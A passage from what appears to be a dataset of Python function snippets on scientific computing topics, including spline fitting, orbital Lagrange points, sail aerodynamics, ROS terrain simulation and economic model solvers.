_define_SLACS_fit_params(self):\n\t\t# Fit params from R_eff\n\t\tself.a = -0.41\n\t\tself.b = 0.39\n\t\t#self.delta_a = 0.12\n\t\t#self.delta_b = 0.10\n\t\tself.intrinsic_scatter = 0.14\n\t\t# Fit params from vel_disp\n\t\tself.a_v = 0.07\n\t\tself.b_v = -0.12\n\t\tself.int_v = 0.17", "def calculate_theta_vals(self) -> None:\n A = np.zeros(self.num_points) # Inappropriate names, but they mirror Knuth's notation.\n B = np.zeros(self.num_points)\n C = np.zeros(self.num_points)\n D = np.zeros(self.num_points)\n R = np.zeros(self.num_points)\n\n # Calculate the entries of the five vectors.\n # Skip first and last point if path is non-cyclic.\n point_ind = range(self.num_points) if self.is_cyclic else range(1, self.num_points - 1)\n for i in point_ind:\n z_h = self.points[i - 1]\n z_i = self.points[i]\n z_j = self.points[(i + 1) % self.num_points]\n\n A[i] = z_h.alpha / (z_i.beta ** 2 * z_h.d_val)\n B[i] = (3 - z_h.alpha) / (z_i.beta ** 2 * z_h.d_val)\n C[i] = (3 - z_j.beta) / (z_i.alpha ** 2 * z_i.d_val)\n D[i] = z_j.beta / (z_i.alpha ** 2 * z_i.d_val)\n R[i] = -B[i] * z_i.psi - D[i] * z_j.psi\n\n # Set up matrix M such that the soln. Mx = R are the theta values.\n M = np.zeros((self.num_points, self.num_points))\n for i in range(self.num_points):\n # Fill i-th row of M\n M[i][i - 1] = A[i]\n M[i][i] = B[i] + C[i]\n M[i][(i + 1) % self.num_points] = D[i]\n\n # Special formulas for first and last rows of M with non-cyclic paths.\n if not self.is_cyclic:\n # First row of M\n alpha_0 = self.points[0].alpha\n beta_1 = self.points[1].beta\n xi_0 = (alpha_0 ** 2 * self.begin_curl) / beta_1 ** 2\n M[0][0] = alpha_0 * xi_0 + 3 - beta_1\n M[0][1] = (3 - alpha_0) * xi_0 + beta_1\n R[0] = -((3 - alpha_0) * xi_0 + beta_1) * self.points[1].psi\n # Last row of M\n alpha_n_1 = self.points[-2].alpha\n beta_n = self.points[-1].beta\n xi_n = (beta_n ** 2 * self.end_curl) / alpha_n_1 ** 2\n M[-1][-2] = (3 - beta_n) * xi_n + alpha_n_1\n M[-1][-1] = (beta_n * xi_n + 3 - alpha_n_1)\n R[-1] = 0\n\n # Solve for theta values.\n thetas = np.linalg.solve(M, R)\n for i, point in enumerate(self.points):\n point.theta = thetas[i]", "def initialize(self):\r\n N = self.N\r\n self.mean = array(self.x0, copy=True)\r\n self.sigma = self.sigma0\r\n self.sigmai = np.ones(N)\r\n self.ps = np.zeros(N) # path for individual and globalstep-size(s)\r\n self.r = np.zeros(N)\r\n self.pr = 0 # cumulation for zr = N(0,1)\r\n self.sigma_r = 0", "def _get_coeffs(self):\n # lift (Clmax) and parasitic drag (Cd0max)\n self.cl = 0.0\n self.cd = 0.0\n kpp = 0.0\n\n for sail in self.sails:\n\n self.cl += sail.cl(self.awa) * sail.area * sail.bk\n self.cd += sail.cd(self.awa) * sail.area * sail.bk\n kpp += sail.cl(self.awa) ** 2 * sail.area * sail.bk * sail.kp\n\n self.cl /= self.area\n self.cd /= self.area\n\n # viscous quadratic parasitic drag and induced drag\n devisor_1 = self.area * self.cl ** 2\n devisor_2 = np.pi * self._heff(self.awa) ** 2\n self.CE = (kpp / devisor_1 if devisor_1 else 0.0) + (self.area / devisor_2 if devisor_2 else 0.0)\n\n # fraction of parasitic drag due to jib\n self.fcdj = 0.0\n for sail in self.sails:\n if sail.type == \"jib\":\n self.fcdj = (\n sail.bk * sail.cd(self.awa) * sail.area / (self.cd * self.area)\n )\n\n # final lift and drag\n self.cd = self.cd * (\n self.flat * self.fcdmult(self.flat) * self.fcdj + (1 - self.fcdj)\n ) + self.CE * self.cl ** 2 * self.flat ** 2 * self.fcdmult(self.flat)\n self.cl = self.flat * self.cl", "def __init__(self):\n self.center = Point()\n self.velocity = Velocity()", "def 
project_gravity_core(xyz):\n ver = []\n hor = []\n \n # mean for each axis\n G = [np.mean(xyz[:, 0]), np.mean(xyz[:, 1]), np.mean(xyz[:, 2])]\n G_norm = G/np.sqrt(sum(np.power(G, 2)) + 0.0000001)\n \n # The projection is here\n for i in range(len(xyz[:, 0])):\n ver.append(float(np.dot([xyz[i, :]], G)))\n hor.append(float(np.sqrt(np.dot(xyz[i, :]-ver[i]*G_norm, xyz[i, :]-ver[i]*G_norm))))\n \n ver = np.reshape(np.asarray(ver), len(ver))\n return Vectors.dense(ver), Vectors.dense(hor)", "def coef_val():\n\n basepath = path.join(path.dirname(path.realpath('__file__')), 'data')\n fdata = basepath + path.sep + 'VAWTPolySurfaceCoef_pub.csv' # published coefficients from paper\n # fdata = basepath + path.sep + 'VAWTPolySurfaceCoef.csv' # polynomial surface fitting coefficients\n\n loc1 = np.zeros(10)\n loc2 = np.zeros(10)\n loc3 = np.zeros(10)\n spr1 = np.zeros(10)\n spr2 = np.zeros(10)\n skw1 = np.zeros(10)\n skw2 = np.zeros(10)\n scl1 = np.zeros(10)\n scl2 = np.zeros(10)\n scl3 = np.zeros(10)\n\n f = open(fdata)\n csv_f = csv.reader(f)\n\n i = 0\n for row in csv_f:\n if i != 0:\n loc1[i-1] = float(row[0])\n loc2[i-1] = float(row[1])\n loc3[i-1] = float(row[2])\n spr1[i-1] = float(row[3])\n spr2[i-1] = float(row[4])\n skw1[i-1] = float(row[5])\n skw2[i-1] = float(row[6])\n scl1[i-1] = float(row[7])\n scl2[i-1] = float(row[8])\n scl3[i-1] = float(row[9])\n i += 1\n\n f.close()\n\n return loc1,loc2,loc3,spr1,spr2,skw1,skw2,scl1,scl2,scl3", "def init(self):\n\n self.pos = np.random.rand(self.N, 7)\n for i in range(3):\n self.pos[:, i] *= (self.bounds[2*i+1] - self.bounds[2*i])\n self.pos[:, i] += self.bounds[2*i]\n\n # Star colors http://www.isthe.com/chongo/tech/astro/HR-temp-mass-table-byhrclass.html http://www.vendian.org/mncharity/dir3/starcolor/\n O3 = np.array([144., 166., 255.])\n O3 /= 255.\n self.pos[:, 3:-1] = O3[None, :]\n M4Ia = np.array([255., 185., 104.])\n M4Ia /= 255.\n self.pos[np.random.rand(self.N)>.5, 3:-1] = M4Ia[None, :]\n\n self.pos[:, -1] = .8 + .2*self.pos[:, -1]", "def lagrangePoints(mu):\n \n # define l = 1-mu\n l = 1 - mu\n \n # collinear points\n def eqL1(x):\n fval = x**5 + 2*(mu-l)*x**4 + (l**2-4*l*mu+mu**2)*x**3 + (2*mu*l*(l-mu)+mu-l)*x**2 + (mu**2*l**2+2*(l**2+mu**2))*x + mu**3-l**3\n #fval = gamma**5 - (3-mu)*gamma**4 + (3-2*mu)*gamma**3 - mu*gamma**2 + 2*mu*gamma - mu\n return fval\n sol_l1 = optimize.root(eqL1, 0.5, method='hybr')\n l1 = np.array([sol_l1.x[0] , 0, 0])\n \n def eqL2(x):\n fval = x**5 + 2*(mu-l)*x**4 + (l**2-4*l*mu+mu**2)*x**3 + (2*mu*l*(l-mu)-(mu+l))*x**2 + (mu**2*l**2+2*(l**2-mu**2))*x - (mu**3+l**3)\n #fval = gamma**5 + (3-mu)*gamma**4 + (3-2*mu)*gamma**3 - mu*gamma**2 - 2*mu*gamma - mu\n return fval\n sol_l2 = optimize.root(eqL2, 1.5, method='hybr')\n l2 = np.array([sol_l2.x[0] , 0, 0])\n \n def eqL3(x):\n fval = x**5 + 2*(mu-l)*x**4 + (l**2-4*mu*l+mu**2)*x**3 + (2*mu*l*(l-mu)+(l+mu))*x**2 + (mu**2*l**2+2*(mu**2-l**2))*x + l**3+mu**3\n return fval\n sol_l3 = optimize.root(eqL3, -1, method='hybr')\n l3 = np.array([sol_l3.x[0] , 0, 0])\n \n # equilateral points\n # L4\n l4 = np.array([np.cos(np.pi/3) - mu , np.sin(np.pi/3), 0])\n # L5\n l5 = np.array([np.cos(np.pi/3) - mu , -np.sin(np.pi/3), 0])\n \n return _lagrangePointsReturn(l1,l2,l3,l4,l5)", "def approximate_nonlinear_vector_field(dataset_path):\n\n file_X0 = \"nonlinear_vectorfield_data_x0.txt\"\n names_X0 = ['X0_x', 'X0_y']\n data_X0 = pd.read_csv(dataset_path / file_X0, sep=' ', names=names_X0).to_numpy()\n plt.scatter(data_X0[:, 0], data_X0[:, 1])\n\n names_X1 = ['X1_x', 'X1_y']\n 
file_X1 = \"nonlinear_vectorfield_data_x1.txt\"\n data_X1 = pd.read_csv(dataset_path / file_X1, sep=' ', names=names_X1).to_numpy()\n plt.scatter(data_X1[:, 0], data_X1[:, 1])\n plt.title(\"Given data set X0 and X1\")\n plt.show()\n\n \"\"\"\n Following block calculates the approximate values using differential\n solver solve_ivp\n \"\"\"\n V = (data_X1 - data_X0) / 0.1\n approx_func_At = np.linalg.inv(data_X0.T @ data_X0) @ data_X0.T @ V\n approx_values = []\n for i in range(data_X0.shape[0]):\n sol = solve_ivp(fun=derivative_func, t_span=[0, 10], t_eval=[0.1],\n y0=data_X0[i, :], args=(approx_func_At,))\n approx_values.append(sol.y)\n approx_values = np.array(approx_values)\n approx_values = approx_values.reshape((2000, 2))\n\n \"\"\"\n We now plot the original data of X1 and the newly approximated data.\n \"\"\"\n plt.scatter(data_X1[:, 0], data_X1[:, 1])\n plt.scatter(approx_values[:, 0], approx_values[:, 1], c='green')\n plt.title(\"Given X1 and approximated values\")\n plt.title(\"Approximated vector field\")\n plt.show()\n\n \"\"\"\n We now plot the vector filed and the phase portrait.\n \"\"\"\n x, y = np.meshgrid(np.linspace(-5, 5, 10), np.linspace(-5, 5, 10))\n u, v = np.zeros((10, 10)), np.zeros((10, 10))\n for i in range(0, 10):\n for j in range(0, 10):\n u[i, j] = approx_values.T[0, i]\n v[i, j] = approx_values.T[1, j]\n plt.quiver(x, y, u, v)\n plt.streamplot(x, y, u, v)\n plt.title(\"Approximated Vector field\")\n plt.show()\n\n \"\"\"\n Following block calculates the mean squared error of the X1 and calculate\n approximated values.\n \"\"\"\n MSE = np.square(data_X1 - approx_values).mean()\n print(MSE)", "def _initialize_default_start(self, state):\n state.tau = self.rng.gamma(0.5, 1 / self.fixed.tau_rate)\n eta = self.rng.standard_normal(self.fixed.n)\n eta = eta - eta.mean()\n state.eta = eta\n state.spatial = self.state.eta\n state.alpha = self.rng.multivariate_normal(\n self.fixed.a_mu, 100 * self.fixed.a_prec, method='cholesky'\n )\n state.beta = self.rng.multivariate_normal(\n self.fixed.b_mu, 100 * self.fixed.b_prec, method='cholesky'\n )\n return state", "def create_vectors(self):\n self.localStatistics = []\n self.lastStatistics = []\n self.globalV = []\n self.estimate = []\n self.delta = []\n self.drift = []\n self.slack = [] # only for coordBased model", "def _mclachlan_atela_4th(vel_update, pos_update=update.PositionUpdate()):\n As = [\n 0.5153528374311229364,\n -0.085782019412973646,\n 0.4415830236164665242,\n 0.1288461583643841854,\n ]\n Bs = [\n 0.1344961992774310892,\n -0.2248198030794208058,\n 0.7563200005156682911,\n 0.3340036032863214255,\n ]\n updates = [vel_update, pos_update]*4\n coeff = []\n for a, b in zip(As, Bs):\n coeff.extend([a, b])\n return ExplicitIntegrator(coeff, updates)", "def solve(self,init=None,g_init=1e-3,g_step=5e-3,g_fin=None,evol=False,movingGrid=False):\n if(g_fin==None): g_fin=self.g\n #Check if all signs are correct\n if(g_fin<0):\n if(g_step>0): g_step*=-1.\n if(g_init>0): g_init*=-1.\n else:\n if(g_step<0): g_step*=-1.\n if(g_init<0): g_step*=-1.\n\n #If no initial distribution is given, start from the BCS ground state\n if(init==None): init=[1 if i<self.N else 0 for i in range(self.n)]\n var_init=np.array([-2.*init[i]-g_init/(1-2.*init[i])*np.sum([self.XXZ.Z(j,i)*(init[j]-init[i]) for j in range(self.n) if j!=i]) for i in range(self.n)])\n n_step=int((g_fin-g_init)/g_step)\n g=g_init\n\n #Define necessary variables if evol or movingGrid=True\n if(evol or movingGrid):\n var_evol=np.zeros([n_step,self.n])\n 
g_evol=np.zeros(n_step)\n if(movingGrid):\n rap_evol = np.zeros([n_step,self.N],dtype=complex)\n rap_evol[0] = [self.levels[i] for i in range(self.n) if init[i]!=0 ]\n rap=np.array([self.levels[i]+0.5*np.abs(np.random.rand()) for i in range(self.n) if init[i]!=0])\n grid=np.zeros(self.N+1,dtype=complex)\n grid[0]=1e3\n for k in range(self.N): grid[k+1]=rap[k]\n n_grid=n_step/20 #Calculates rapidities at 20 intermediate steps\n\n #Gradually increase the coupling constant g and solve iteratively at each step starting from the Taylor approximation from the previous step\n for i in range(n_step):\n var_new=self.newtonraphson(g,var_init)\n der=self.get_derivative(var_new,g)\n #var_init=self.taylor_expansion(g,g_step,var_new)\n var_init = var_new+g_step*der\n g+=g_step\n #print g\n\n #Save variables at current step if evol =True\n if(evol or movingGrid):\n var_evol[i]=var_init\n g_evol[i]=g\n if(movingGrid and i%n_grid==0 and i!=0):\n #Method for obtaining the rapidities starting from the set of Lambda_i\n rf=RootFinder(self.XXZ,var_evol[i]/g_evol[i],g_evol[i],self.N)\n u=rf.solveForU(grid)\n lm=LaguerreMethod(grid,u)\n rap=lm.laguerre()\n rap_evol[i]=np.sort(lm.laguerre())\n for k in range(self.N): grid[k+1]=rap[k]\n grid[0]=10*max(rap)\n elif(movingGrid and i!=0):\n rf=RootFinder(self.XXZ,var_evol[i]/g_evol[i],g_evol[i],self.N)\n u=rf.solveForU(grid)\n lm=LaguerreMethod(grid,u)\n rap_evol[i]=np.sort(lm.laguerre())\n \n \n #One final iterative solution at g=g_fin\n self.solution=self.newtonraphson(g_fin,var_init)\n #Calculate the occupation numbers\n self.occupation=0.5*(-1.-self.solution+g_fin*self.get_derivative(self.solution,g_fin))\n\n #One final calculation of the rapidities\n if(movingGrid):\n rf=RootFinder(self.XXZ,self.solution/g_fin,g_fin,self.N)\n u=rf.solveForU(grid)\n lm=LaguerreMethod(grid,u)\n rap=lm.laguerre()\n self.rapidities=rap\n\n if movingGrid: return [g_evol,var_evol,rap_evol]\n if evol: return [g_evol,var_evol]\n return self.solution", "def __init__(self, t0, t1, hours=(\"00:00\", \"23:45\"),\n forecast_zones=\"DK\", norm=False, TimeResolution=\"15T\"):\n \n self.t0 = t0\n self.t1 = t1\n self.muni_input = forecast_zones\n self.norm = norm\n self.Time = TimeResolution\n self.fc_zones = self._muni_interpreter(self.muni_input)\n self.fc_obj = import_muni_forecast(self.t0, self.t1,\n hours=hours,\n muni_list=self.fc_zones,\n sub_h_freq=self.Time)\n root = return_to_root()\n coef_path = 'scripts/rad_model_development/'\n stem_path = '/data/stem_data/'\n self.all_KNr = np.array(pd.read_excel(root + stem_path +\n 'Kommune_GridNr.xlsx',\n header=0)['Kommune_Nr'])\n \n # Importing season, muni and time parameters\n self.beta = np.load(root + coef_path + 'rad_coef_merge.pickle')\n \n self.season = {}\n self.season['DK'] = self.beta['season']['coef_s'][0:4].reshape((1,4))[0]\n self.season['zones'] = self.beta['season']['coef_s'][4:8].reshape((1,4))[0]\n self.season['munis'] = self.beta['season']['coef_s'][8:12].reshape((1,4))[0]\n \n self.time = {}\n self.time['DK'] = self.beta['time']['coef_t'][0:24].reshape((1,24))[0]\n self.time['zones'] = self.beta['time']['coef_t'][24:48].reshape((1,24))[0]\n self.time['munis'] = self.beta['time']['coef_t'][48:72].reshape((1,24))[0]\n \n self.muni = self.beta['muni']['coef_m'].reshape((1,101))[0]\n \n self.GHI = self.fc_obj.GHI*10**(-3) # Scaled to MW\n self.KNr = self.fc_obj.muninr\n self.hour = (self.fc_obj.GHI.index[0].hour,\n self.fc_obj.GHI.index[-1].hour)\n self.minutes = (self.fc_obj.GHI.index[0].time().minute,\n 
self.fc_obj.GHI.index[-1].time().minute)\n self.t0 = pd.Timestamp(self.fc_obj.GHI.index[0].date())\n self.t1 = pd.Timestamp(self.fc_obj.GHI.index[-1].date())\n self.IndxSet = self.findIndx()\n self.rng_single_day = pd.date_range(self.t0 +\n pd.Timedelta(hours=self.hour[0],\n minutes=self.minutes[0]),\n self.t0 +\n pd.Timedelta(hours=self.hour[-1],\n minutes=self.minutes[-1]),\n freq=self.Time)\n\n self.rng = pd.date_range(self.t0 + pd.Timedelta(hours=self.hour[0],\n minutes=self.minutes[0]),\n self.t1 + pd.Timedelta(hours=self.hour[-1],\n minutes=self.minutes[-1]),\n freq=self.Time)", "def define_ufl_equations_diff(self):\n\n # Derivatives of velocity integration equation.\n if self.f1 != 0:\n self.df1_du = dlf.derivative(self.f1, self.displacement, self.trial_vector)\n self.df1_dv = dlf.derivative(self.f1, self.velocity, self.trial_vector)\n else:\n self.df1_du = 0\n self.df1_dv = 0\n self.df1_dp = 0 # This is always zero.\n\n # Derivatives of momentum equation.\n if self.displacement != 0:\n self.df2_du = dlf.derivative(self.f2, self.displacement, self.trial_vector)\n else:\n self.df2_du = 0\n\n if self.velocity != 0:\n self.df2_dv = dlf.derivative(self.f2, self.velocity, self.trial_vector)\n else:\n self.df2_dv = 0\n\n if self.pressure != 0:\n self.df2_dp = dlf.derivative(self.f2, self.pressure, self.trial_scalar)\n else:\n self.df2_dp = 0\n\n # Derivatives of incompressibility equation.\n if self.f3 != 0:\n if self.displacement != 0:\n self.df3_du = dlf.derivative(self.f3, self.displacement, self.trial_vector)\n else:\n self.df3_du = 0\n\n if self.velocity != 0:\n self.df3_dv = dlf.derivative(self.f3, self.velocity, self.trial_vector)\n else:\n self.df3_dv = 0\n\n self.df3_dp = dlf.derivative(self.f3, self.pressure, self.trial_scalar)\n else:\n self.df3_du = 0\n self.df3_dv = 0\n self.df3_dp = 0\n\n return None", "def solve_prep(self):\n\n par = self.par\n sol = self.sol\n\n # a. retirement\n sol.m_ret = np.zeros((par.T,par.Nm_ret))\n sol.c_ret = np.zeros((par.T,par.Nm_ret))\n sol.a_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_v_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vm_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vn_ret = np.zeros((par.T,par.Nm_ret))\n\n # b. 
working\n if par.solmethod == 'G2EGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.ucon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.dcon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.acon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.z = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n \n elif par.solmethod == 'NEGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((0,0,0))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((0,0,0))\n \n sol.c_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))\n sol.inv_v_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))", "def update_position(self, event):\n\n # Create a copy of the most recent stored twist data to perform calculations\n with self.lock:\n velocity_data = copy.deepcopy(self.twist)\n\n # Time elapsed since last update position call\n if hasattr(event, 'last_real'):\n if event.last_real is None:\n time = rospy.Duration(0.05)\n else:\n time = event.current_real - event.last_real\n \n time = time.to_sec()\n\n # Calculate angle turned in the given time using omega = theta/time\n angle = velocity_data.angular.z*time\n\n # Calculate distance travelled in the given time using linear velocity = arc distance/time\n distance = velocity_data.linear.x*time\n\n # Calculate yaw of the robot\n self.vehicle_yaw += angle\n\n # Calculate vehicle x, y, z position coordinates\n # TODO recalculate the position based on traveling in a circular arc.\n self.pose.position.x += (distance)*cos(self.vehicle_yaw)\n self.pose.position.y += (distance)*sin(self.vehicle_yaw)\n\n # Calculate z position using linear interpolation and create cloud array\n \n # 1. Create ranges to be used in interpolation function\n terrain_points_x = np.arange(0, self.gaussian_array.shape[1]*self.resolution, self.resolution)\n terrain_points_y = np.arange(0, self.gaussian_array.shape[0]*self.resolution, self.resolution)\n\n # 2. Create array of points to be converted to point cloud for vizualization\n terrain_mesh_x, terrain_mesh_y = np.meshgrid(terrain_points_x, terrain_points_y)\n terrain_x = terrain_mesh_x.ravel()\n terrain_y = terrain_mesh_y.ravel()\n terrain_z = self.gaussian_array.ravel()\n terrain_grid_points = np.stack((terrain_x, terrain_y, terrain_z), axis=1)\n\n # 3. Create interpolation function based on the ranges and gaussian data\n interp_func = RectBivariateSpline(terrain_points_y, terrain_points_x, self.gaussian_array)\n\n # 4. 
Find z value for x and y coordinate of vehicle using interpolation function\n # TODO compute z height based on footprint\n self.pose.position.z = interp_func(self.pose.position.y, self.pose.position.x)\n\n # Convert Euler Angles to Quarternion\n V_rotation = tf.transformations.quaternion_from_euler(0.0, 0.0, self.vehicle_yaw)\n\n # Broadcast vehicle frame which is a child of the world frame\n br = tf.TransformBroadcaster()\n br.sendTransform((self.pose.position.x, self.pose.position.y, self.pose.position.z), \n V_rotation, rospy.Time.now(),\"vehicle_frame\", \"map\")\n\n # Construct the homogenous transformation matrix for map to vehicle frame\n V_translation = [self.pose.position.x, self.pose.position.y, self.pose.position.z]\n map_T_V = tf.transformations.quaternion_matrix(V_rotation) \n map_T_V[:3,3] = np.array(V_translation)\n\n # Create footprint of vehicle\n V_footprint_range_x = np.linspace((-self.vehicle_length/2), (self.vehicle_length/2), 30)\n V_footprint_range_y = np.linspace((-self.vehicle_width/2), (self.vehicle_width/2), 15)\n V_footprint_mesh_x, V_footprint_mesh_y = np.meshgrid(V_footprint_range_x, V_footprint_range_y)\n V_footprint_x = V_footprint_mesh_x.ravel()\n V_footprint_y = V_footprint_mesh_y.ravel()\n\n # For every point in the vehicle footprint, calculate the position wrt to the vehicle's frame\n # and its interpolated z value. Add this point to a list of points for visualization.\n # TODO Flatten into a single matrix multiply to remove for loop\n V_viz_points = []\n for i in range(V_footprint_x.shape[0]):\n p = Point()\n V_footprint_point = np.array([[V_footprint_x[i]],[V_footprint_y[i]], [0.0], [1.0]])\n V_footprint_point = np.matmul(map_T_V, V_footprint_point)\n V_footprint_point[2, 0] = interp_func(V_footprint_point[1, 0], V_footprint_point[0, 0])\n p.x = V_footprint_point[0, 0]\n p.y = V_footprint_point[1, 0]\n p.z = V_footprint_point[2, 0]\n V_viz_points.append(p)\n\n #####################################################################################\n # Create a copy of the most recent stored JointState data to perform calculations\n with self.joint_lock:\n joint_data = copy.deepcopy(self.joint)\n\n # If the data is empty on first run, fill with 0.0\n if not joint_data.velocity:\n joint_data.velocity = [0.0,0.0]\n \n # Calculate angle based on velocity data and time\n angle = joint_data.velocity[0]*time\n angle2 = joint_data.velocity[1]*time\n\n self.joint1_pitch += angle\n self.joint2_pitch += angle2\n\n # Transformations from vehicle frame to Joint1 and Joint2\n \n # Static rotation about z-axis \n static_rot = tf.transformations.quaternion_from_euler(0.0, 0.0, 3.14159)\n translation = [0.0, 0.0, 0.0]\n V_T_SRz = tf.transformations.quaternion_matrix(static_rot)\n V_T_SRz[:3,3] = np.array(translation)\n\n # Dynamic rotation about the y-axis of Joint 1\n rot_SRz_T_J1 = [[cos(self.joint1_pitch), 0.0, sin(self.joint1_pitch)],\n [0.0, 1.0, 0.0],\n [-sin(self.joint1_pitch), 0.0, cos(self.joint1_pitch)]]\n\n trans_SRz_T_J1 = [0.0, 0.0, 0.0, 1.0]\n\n SRz_T_J1 = np.zeros((4,4))\n SRz_T_J1[:3,:3] = rot_SRz_T_J1\n SRz_T_J1[:4,3] = trans_SRz_T_J1\n\n # Translation based on length of Joint 1 arm \n no_rot = tf.transformations.quaternion_from_euler(0.0, 0.0, 0.0)\n translation = [self.joint1_length, 0.0, 0.0]\n J1_T_STx = tf.transformations.quaternion_matrix(no_rot)\n J1_T_STx[:3,3] = np.array(translation)\n\n # Dynamic rotation about y-axis of Joint 2\n dynamic_rot2 = tf.transformations.quaternion_from_euler(0.0, self.joint2_pitch, 0.0)\n translation = [0.0, 0.0, 
0.0]\n STx_T_J2 = tf.transformations.quaternion_matrix(dynamic_rot2)\n STx_T_J2[:3,3] = np.array(translation)\n\n # matrix multiplication to form the homogenous matrices\n V_T_J1 = np.matmul(V_T_SRz, SRz_T_J1)\n V_T_STx = np.matmul(V_T_J1, J1_T_STx)\n V_T_J2 = np.matmul(V_T_STx, STx_T_J2)\n\n frame_J1 = tf_conversions.fromMatrix(V_T_J1)\n frame_J2 = tf_conversions.fromMatrix(V_T_J2)\n\n # The ripper tip is a point in the J2's frame, this is based on the length of the ripper\n ripper_tip_point_J2 = [self.ripper_length, 0.0, 0.0, 1.0]\n map_T_J2 = np.matmul(map_T_V, V_T_J2)\n ripper_tip_pt_map = np.matmul(map_T_J2, ripper_tip_point_J2)\n ripper_tip_point_viz = Point()\n ripper_tip_point_viz.x = ripper_tip_pt_map[0]\n ripper_tip_point_viz.y = ripper_tip_pt_map[1]\n ripper_tip_point_viz.z = ripper_tip_pt_map[2]\n V_viz_points.append(ripper_tip_point_viz)\n\n # use the ripper's position as an index value to access the gaussian array\n ripper_tip_cell_index_x = int(ripper_tip_pt_map[1]/self.resolution)\n ripper_tip_cell_index_y = int(ripper_tip_pt_map[0]/self.resolution)\n\n # Create a range of index values surrounding index_x and y\n nearby_index_cells_range_x = np.arange((ripper_tip_cell_index_x-1),(ripper_tip_cell_index_x+2), 1)\n nearby_index_cells_range_y = np.arange((ripper_tip_cell_index_y-1),(ripper_tip_cell_index_y+2), 1)\n nearby_index_cells_mesh_x, nearby_index_cells_mesh_y = np.meshgrid(nearby_index_cells_range_x,nearby_index_cells_range_y)\n nearby_index_cells_x = nearby_index_cells_mesh_x.ravel()\n nearby_index_cells_y = nearby_index_cells_mesh_y.ravel()\n\n # First check if the index is within the gaussian array, if it is, then check if the tip of\n # the ripper is beneath the soil, if it is, then remove the soil above the tip and disperse\n # it to the surrounding cells, provided those cells are also within the gaussian array\n # TODO Remove use of for loops and excess if statements\n\n if (0 <= ripper_tip_cell_index_x <= (self.gaussian_array.shape[0]-1)) and (0 <= ripper_tip_cell_index_y <= (self.gaussian_array.shape[1]-1)):\n if (self.gaussian_array[ripper_tip_cell_index_x][ripper_tip_cell_index_y] > ripper_tip_pt_map[2]):\n diff = self.gaussian_array[ripper_tip_cell_index_x][ripper_tip_cell_index_y] - ripper_tip_pt_map[2]\n for i in range(nearby_index_cells_x.shape[0]):\n if (0 <= nearby_index_cells_x[i] <= (self.gaussian_array.shape[0]-1)) and (0 <= nearby_index_cells_y[i] <= (self.gaussian_array.shape[1]-1)):\n self.gaussian_array[nearby_index_cells_x[i]][nearby_index_cells_y[i]] += diff/8\n self.gaussian_array[ripper_tip_cell_index_x][ripper_tip_cell_index_y] = ripper_tip_pt_map[2]\n \n\n # Publish all messages\n self.publish_messages(V_translation, V_rotation, terrain_grid_points, V_viz_points, frame_J1, frame_J2)", "def InitPositions(N, L):\n #make the position array\n Pos = np.zeros((N,3), float)\n #compute integer grid # of locations for cubic lattice\n NLat = int(N**(1./3.) 
+ 1.)\n LatSpac = float(L) / float(NLat)\n #make an array of lattice sites\n r = LatSpac * np.arange(NLat, dtype=float) - 0.5*L\n #loop through x, y, z positions in lattice until done\n #for every atom in the system\n i = 0\n for x in r:\n for y in r:\n for z in r:\n Pos[i] = np.array([x,y,z], float)\n #add a random offset to help initial minimization\n Offset = 0.1 * LatSpac * (np.random.rand(3) - 0.5)\n Pos[i] = Pos[i] + Offset\n i += 1\n #if done placing atoms, return\n if i >= N:\n return Pos\n return Pos", "def calc(self):\n\n # the following if query ensures that volume- and interaction-terms\n # are only calculated if tau > 0.\n # (to avoid nan-values from invalid function-evaluations)\n\n if self.V.tau.shape == (1,):\n Isurf = self.surface()\n # differentiation for non-existing canopy, as otherwise NAN values\n if self.V.tau > 0.:\n Ivol = self.volume()\n if self.int_Q is True:\n Iint = self.interaction()\n else:\n Iint = np.array([0.])\n else:\n Ivol = np.array([0.])\n Iint = np.array([0.])\n else:\n # calculate surface-term (valid for any tau-value)\n Isurf = self.surface()\n\n # store initial parameter-values\n old_t_0 = self.t_0\n old_p_0 = self.p_0\n old_t_ex = self.t_ex\n old_p_ex = self.p_ex\n\n old_tau = self.V._get_tau()\n old_omega = self.V._get_omega()\n old_NN = self.SRF._get_NormBRDF()\n\n # set mask for tau > 0.\n mask = old_tau > 0.\n valid_index = np.where(mask)\n inval_index = np.where(~mask)\n\n # set parameter-values to valid values for calculation\n self.t_0 = old_t_0[valid_index[0]]\n self.p_0 = old_p_0[valid_index[0]]\n self.t_ex = old_t_ex[valid_index[0]]\n self.p_ex = old_p_ex[valid_index[0]]\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically adds an axis to 